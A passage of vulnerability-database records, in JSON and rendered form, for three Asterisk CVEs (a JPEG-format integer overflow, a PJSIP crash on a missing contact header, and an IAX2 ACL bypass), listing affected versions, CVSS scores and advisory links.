              "matchCriteriaId": "BE096C63-221B-4746-B8B6-9314C4CD6FFE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "33DCA1D9-0D47-4F0A-A78F-F85FADE0C9B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "24CE1C95-D4C7-4662-AD0D-5219335BAF40",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "ACC453F5-C46A-45E9-B7DE-3C5BF752F305",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9149505F-D47B-40C3-93EB-A3C647A1AC9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "94FC8F82-D648-4127-9914-27414358AC33",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0CCCA63B-AB59-4827-BD6F-4AF0155151F5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "16FC9C13-ADDD-4F09-B977-EE0DEF598B1B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.7.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2C20296F-F70A-4D3C-A062-B6054617841C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E9A92B4D-16A7-4D99-8F3A-2E5D3B12C86B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "16783925-8EC5-431F-90B5-93B16DCC10B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9C59AF9E-FEC7-44AB-B392-49DB11BAEB0D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "325C4452-6541-46F6-A86C-6D6987583FB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5424B5B4-99B3-4695-8E0D-7E8DC8B88C3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "62BDF9F0-1AFD-47E6-9054-A9FC6D422DD4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A8D2125-019A-4B73-9E1A-98E745148803",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "46C60C04-EF59-4F5C-96E5-A6E693EA9A06",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "3636BB44-DF4D-40AB-8EBB-1EC5D911E4A2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3B3C254-29D9-4911-89A9-AC0CD9EB13F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0_rc1:*:*:*:*:*:*:*",
              "matchCriteriaId": "E49F2D76-DC82-4289-8891-4982795D896A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.0_rc2:*:*:*:*:*:*:*",
              "matchCriteriaId": "203237E0-BB44-42D0-B65B-CBDAAA68A1BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0_beta1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4042CC21-F3CB-4C77-9E60-AF8AA9A191C7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Integer signedness error in format_jpeg.c in Asterisk 1.2.6 and earlier allows remote attackers to execute arbitrary code via a length value that passes a length check as a negative number, but triggers a buffer overflow when it is used as an unsigned length."
    }
  ],
  "id": "CVE-2006-1827",
  "lastModified": "2024-11-21T00:09:51.357",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.4,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2006-04-18T20:02:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://ftp.digium.com/pub/asterisk/releases/asterisk-1.2.7-patch.gz"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/19800"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/19872"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/19897"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Patch"
      ],
      "url": "http://www.cipher.org.uk/index.php?p=advisories/Asterisk_Codec_Integer_Overflow_07-04-2006.advisory"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2006/dsa-1048"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.novell.com/linux/security/advisories/2006_04_28.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/17561"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/1478"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://ftp.digium.com/pub/asterisk/releases/asterisk-1.2.7-patch.gz"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/19800"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/19872"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/19897"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Patch"
      ],
      "url": "http://www.cipher.org.uk/index.php?p=advisories/Asterisk_Codec_Integer_Overflow_07-04-2006.advisory"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2006/dsa-1048"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.novell.com/linux/security/advisories/2006_04_28.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/17561"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/1478"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2017-12-27 17:08

Modified

2024-11-21 03:18

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in Asterisk 13.18.4 and older, 14.7.4 and older, 15.1.4 and older, and 13.18-cert1 and older. A select set of SIP messages create a dialog in Asterisk. Those SIP messages must contain a contact header. For those messages, if the header was not present and the PJSIP channel driver was used, Asterisk would crash. The severity of this vulnerability is somewhat mitigated if authentication is enabled. If authentication is enabled, a user would have to first be authorized before reaching the crash point.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2017-014.html	Vendor Advisory
cve@mitre.org	http://www.securitytracker.com/id/1040056	Third Party Advisory, VDB Entry
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27480	Issue Tracking, Vendor Advisory
cve@mitre.org	https://security.gentoo.org/glsa/201811-11
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2017-014.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1040056	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27480	Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://security.gentoo.org/glsa/201811-11

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	13.1.0
digium	certified_asterisk	13.1.0
digium	certified_asterisk	13.1.0
digium	certified_asterisk	13.8

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FEE78C41-D7BE-4910-BB77-3DFB63690382",
              "versionEndIncluding": "13.18.4",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A845013E-DD73-45F2-A962-6F0A580A4E95",
              "versionEndIncluding": "14.7.4",
              "versionStartIncluding": "14.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "09447B7F-89BA-4FD5-8E6F-A166681A22F7",
              "versionEndIncluding": "15.1.4",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9F68ED1E-8D2B-4AEE-B5DE-FD50338BA82D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "EA9F296A-4932-4EA4-8B38-80856A9D6374",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B40673A6-2980-440A-B78E-D5C7095E3FA6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "38E19C8E-9FD6-4A44-81C6-EEC91BC2CB58",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Asterisk 13.18.4 and older, 14.7.4 and older, 15.1.4 and older, and 13.18-cert1 and older. A select set of SIP messages create a dialog in Asterisk. Those SIP messages must contain a contact header. For those messages, if the header was not present and the PJSIP channel driver was used, Asterisk would crash. The severity of this vulnerability is somewhat mitigated if authentication is enabled. If authentication is enabled, a user would have to first be authorized before reaching the crash point."
    },
    {
      "lang": "es",
      "value": "Se ha descubierto un problema en Asterisk en versiones 13.18.4 y anteriores, 14.7.4 y anteriores, 15.1.4 y anteriores y 13.18-cert1 y anteriores. Un conjunto de mensajes SIP seleccionados crean un di\u00e1logo en Asterisk. Estos mensajes SIP deben contener una cabecera contact. Para estos mensajes, si la cabecera no estuviera presente y se utilizase el controlador de canal PJSIP, Asterisk se cerrar\u00eda de forma inesperada. La gravedad de esta vulnerabilidad se mitiga en cierta medida habilitando la autenticaci\u00f3n. Si se habilita la autenticaci\u00f3n, un usuario tendr\u00eda que estar autorizado antes de alcanzar el punto de cierre inesperado."
    }
  ],
  "id": "CVE-2017-17850",
  "lastModified": "2024-11-21T03:18:48.837",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-12-27T17:08:20.017",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-014.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040056"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27480"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://security.gentoo.org/glsa/201811-11"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-014.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040056"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27480"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://security.gentoo.org/glsa/201811-11"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2012-08-31 14:55

Modified

2024-11-21 01:43

Severity ?

Summary

channels/chan_iax2.c in Asterisk Open Source 1.8.x before 1.8.15.1 and 10.x before 10.7.1, Certified Asterisk 1.8.11 before 1.8.11-cert7, Asterisk Digiumphones 10.x.x-digiumphones before 10.7.1-digiumphones, and Asterisk Business Edition C.3.x before C.3.7.6 does not enforce ACL rules during certain uses of peer credentials, which allows remote authenticated users to bypass intended outbound-call restrictions by leveraging the availability of these credentials.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2012-013.html	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/50687
cve@mitre.org	http://secunia.com/advisories/50756
cve@mitre.org	http://www.debian.org/security/2012/dsa-2550
cve@mitre.org	http://www.securityfocus.com/bid/55335
cve@mitre.org	http://www.securitytracker.com/id?1027461
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2012-013.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/50687
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/50756
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2012/dsa-2550
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/55335
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1027461

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.1
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.1
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.12
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.1
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.1
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.1
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.1
digium	asterisk	10.1.2
digium	asterisk	10.1.3
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.1
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.1
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.1
digium	asterisk	10.4.2
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.1
digium	asterisk	10.6.0
digium	asterisk	10.6.0
digium	asterisk	10.6.0
digium	asterisk	10.6.1
digium	asterisk	10.7.0
digium	asterisk	10.7.0
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	asterisk	10.5.2
digium	asterisk	10.6.0
digium	asterisk	10.6.1
digium	asterisk	10.7.0
digium	asterisk	c.3.0
digium	asterisk	c.3.1.0
digium	asterisk	c.3.1.1
digium	asterisk	c.3.2.2
digium	asterisk	c.3.2.3
digium	asterisk	c.3.3.2
digium	asterisk	c.3.6.2
digium	asterisk	c.3.6.3
digium	asterisk	c.3.6.4
digium	asterisk	c.3.7.5

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
